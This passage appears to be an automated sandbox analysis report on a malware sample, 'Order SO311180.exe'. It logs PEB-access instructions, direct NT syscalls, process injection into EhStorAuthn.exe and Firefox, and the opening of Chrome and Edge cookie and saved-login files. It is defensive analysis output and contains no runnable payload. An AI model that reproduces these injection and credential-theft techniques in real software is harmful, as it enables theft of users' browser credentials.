Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A9D0 mov eax, dword ptr fs:[00000030h] 3_2_0188A9D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B49D0 mov eax, dword ptr fs:[00000030h] 3_2_018B49D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190E9E0 mov eax, dword ptr fs:[00000030h] 3_2_0190E9E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B29F9 mov eax, dword ptr fs:[00000030h] 3_2_018B29F9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C912 mov eax, dword ptr fs:[00000030h] 3_2_0190C912
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE908 mov eax, dword ptr fs:[00000030h] 3_2_018FE908
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878918 mov eax, dword ptr fs:[00000030h] 3_2_01878918
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190892A mov eax, dword ptr fs:[00000030h] 3_2_0190892A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0191892B mov eax, dword ptr fs:[00000030h] 3_2_0191892B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954940 mov eax, dword ptr fs:[00000030h] 3_2_01954940
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01900946 mov eax, dword ptr fs:[00000030h] 3_2_01900946
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E mov eax, dword ptr fs:[00000030h] 3_2_018C096E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E mov edx, dword ptr fs:[00000030h] 3_2_018C096E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A6962 mov eax, dword ptr fs:[00000030h] 3_2_018A6962
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01924978 mov eax, dword ptr fs:[00000030h] 3_2_01924978
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C97C mov eax, dword ptr fs:[00000030h] 3_2_0190C97C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C89D mov eax, dword ptr fs:[00000030h] 3_2_0190C89D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880887 mov eax, dword ptr fs:[00000030h] 3_2_01880887
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AE8C0 mov eax, dword ptr fs:[00000030h] 3_2_018AE8C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019508C0 mov eax, dword ptr fs:[00000030h] 3_2_019508C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194A8E4 mov eax, dword ptr fs:[00000030h] 3_2_0194A8E4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BC8F9 mov eax, dword ptr fs:[00000030h] 3_2_018BC8F9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190C810 mov eax, dword ptr fs:[00000030h] 3_2_0190C810
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192483A mov eax, dword ptr fs:[00000030h] 3_2_0192483A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BA830 mov eax, dword ptr fs:[00000030h] 3_2_018BA830
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov eax, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A2835 mov ecx, dword ptr fs:[00000030h] 3_2_018A2835
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01892840 mov ecx, dword ptr fs:[00000030h] 3_2_01892840
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01884859 mov eax, dword ptr fs:[00000030h] 3_2_01884859
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B0854 mov eax, dword ptr fs:[00000030h] 3_2_018B0854
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916870 mov eax, dword ptr fs:[00000030h] 3_2_01916870
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190E872 mov eax, dword ptr fs:[00000030h] 3_2_0190E872
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934BB0 mov eax, dword ptr fs:[00000030h] 3_2_01934BB0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890BBE mov eax, dword ptr fs:[00000030h] 3_2_01890BBE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890BBE mov eax, dword ptr fs:[00000030h] 3_2_01890BBE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0BCB mov eax, dword ptr fs:[00000030h] 3_2_018A0BCB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192EBD0 mov eax, dword ptr fs:[00000030h] 3_2_0192EBD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880BCD mov eax, dword ptr fs:[00000030h] 3_2_01880BCD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190CBF0 mov eax, dword ptr fs:[00000030h] 3_2_0190CBF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEBFC mov eax, dword ptr fs:[00000030h] 3_2_018AEBFC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888BF0 mov eax, dword ptr fs:[00000030h] 3_2_01888BF0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FEB1D mov eax, dword ptr fs:[00000030h] 3_2_018FEB1D
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954B00 mov eax, dword ptr fs:[00000030h] 3_2_01954B00
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEB20 mov eax, dword ptr fs:[00000030h] 3_2_018AEB20
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEB20 mov eax, dword ptr fs:[00000030h] 3_2_018AEB20
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01948B28 mov eax, dword ptr fs:[00000030h] 3_2_01948B28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01948B28 mov eax, dword ptr fs:[00000030h] 3_2_01948B28
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192EB50 mov eax, dword ptr fs:[00000030h] 3_2_0192EB50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01952B57 mov eax, dword ptr fs:[00000030h] 3_2_01952B57
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01928B42 mov eax, dword ptr fs:[00000030h] 3_2_01928B42
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916B40 mov eax, dword ptr fs:[00000030h] 3_2_01916B40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916B40 mov eax, dword ptr fs:[00000030h] 3_2_01916B40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194AB40 mov eax, dword ptr fs:[00000030h] 3_2_0194AB40
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878B50 mov eax, dword ptr fs:[00000030h] 3_2_01878B50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934B4B mov eax, dword ptr fs:[00000030h] 3_2_01934B4B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01934B4B mov eax, dword ptr fs:[00000030h] 3_2_01934B4B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187CB7E mov eax, dword ptr fs:[00000030h] 3_2_0187CB7E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188EA80 mov eax, dword ptr fs:[00000030h] 3_2_0188EA80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954A80 mov eax, dword ptr fs:[00000030h] 3_2_01954A80
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B8A90 mov edx, dword ptr fs:[00000030h] 3_2_018B8A90
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888AA0 mov eax, dword ptr fs:[00000030h] 3_2_01888AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01888AA0 mov eax, dword ptr fs:[00000030h] 3_2_01888AA0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6AA4 mov eax, dword ptr fs:[00000030h] 3_2_018D6AA4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018D6ACC mov eax, dword ptr fs:[00000030h] 3_2_018D6ACC
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01880AD0 mov eax, dword ptr fs:[00000030h] 3_2_01880AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4AD0 mov eax, dword ptr fs:[00000030h] 3_2_018B4AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B4AD0 mov eax, dword ptr fs:[00000030h] 3_2_018B4AD0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BAAEE mov eax, dword ptr fs:[00000030h] 3_2_018BAAEE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BAAEE mov eax, dword ptr fs:[00000030h] 3_2_018BAAEE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190CA11 mov eax, dword ptr fs:[00000030h] 3_2_0190CA11
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AEA2E mov eax, dword ptr fs:[00000030h] 3_2_018AEA2E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BCA24 mov eax, dword ptr fs:[00000030h] 3_2_018BCA24
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BCA38 mov eax, dword ptr fs:[00000030h] 3_2_018BCA38
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A4A35 mov eax, dword ptr fs:[00000030h] 3_2_018A4A35
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A4A35 mov eax, dword ptr fs:[00000030h] 3_2_018A4A35
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890A5B mov eax, dword ptr fs:[00000030h] 3_2_01890A5B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01890A5B mov eax, dword ptr fs:[00000030h] 3_2_01890A5B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886A50 mov eax, dword ptr fs:[00000030h] 3_2_01886A50
Source: C:\Users\user\Desktop\Order SO311180.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryVolumeInformationFile: Direct from: 0x77382F2C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQuerySystemInformation: Direct from: 0x773848CC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtReadVirtualMemory: Direct from: 0x77382E8C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateKey: Direct from: 0x77382C6C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x773848EC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryAttributesFile: Direct from: 0x77382E6C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtSetInformationThread: Direct from: 0x77382B4C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtTerminateThread: Direct from: 0x77382FCC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtQueryInformationToken: Direct from: 0x77382CAC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenKeyEx: Direct from: 0x77382B9C
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtAllocateVirtualMemory: Direct from: 0x77382BEC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtDeviceIoControlFile: Direct from: 0x77382AEC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtCreateFile: Direct from: 0x77382FEC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtOpenFile: Direct from: 0x77382DCC
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe NtProtectVirtualMemory: Direct from: 0x77377B2E
Source: C:\Users\user\Desktop\Order SO311180.exe Memory written: C:\Users\user\Desktop\Order SO311180.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: execute and read and write
Source: C:\Users\user\Desktop\Order SO311180.exe Section loaded: NULL target: C:\Windows\SysWOW64\EhStorAuthn.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: read write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread register set: target process: 5876
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Thread APC queued: target process: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe
Source: C:\Users\user\Desktop\Order SO311180.exe Process created: C:\Users\user\Desktop\Order SO311180.exe "C:\Users\user\Desktop\Order SO311180.exe"
Source: C:\Program Files (x86)\OZOmoDuyXxGUnNpIEESMrYeHbbvBihLMPtDvbFuiwJsrjvSddeytUAWhLdgl\GfSuWuMUukRRDP.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: GfSuWuMUukRRDP.exe, 00000006.00000002.3421283404.00000000011B0000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000006.00000000.2607882878.00000000011B1000.00000002.00000001.00040000.00000000.sdmp, GfSuWuMUukRRDP.exe, 00000008.00000002.3421488399.00000000018C0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Users\user\Desktop\Order SO311180.exe VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Order SO311180.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
